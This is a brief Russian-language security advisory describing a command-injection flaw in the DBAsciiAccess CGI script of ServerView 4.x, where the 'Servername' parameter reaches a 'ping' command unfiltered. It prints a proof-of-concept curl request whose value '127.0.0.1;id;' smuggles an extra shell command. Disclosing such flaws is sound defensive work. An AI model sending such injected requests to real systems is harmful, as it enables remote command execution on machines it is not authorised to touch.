Программа: ServerView 4.x

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «Servername» в DBAsciiAccess CGI сценарии перед использованием в команде «ping». Удаленный пользователь может выполнить произвольные команды на целевой системе. 

Пример:

curl
«http://www.example.com/cgi-bin/ServerView/
SnmpView/DBAsciiAccess
?SSL=
&Application=ServerView/SnmpView
&Submit=Submit
&UserID=1
&Profile=
&DBAccess=ASCII
&Viewing=-1
&Action=Show
&ThisApplication=TestConnectivityFrame
&DBElement=ServerName
&DBValue=bcmes
&DBList=snism
&UserValue=
&DBTableList=SERVER_LIST
&Sorting=
&ParameterList=What—primary,,
OtherCommunity—public,,
SecondIP—,,
Timeout—5,,
Community—public,,
ServerName—bcmes,,
Servername—127.0.0.1;id;,, # vulnerable parameter
SType—Server"



Оставить мнение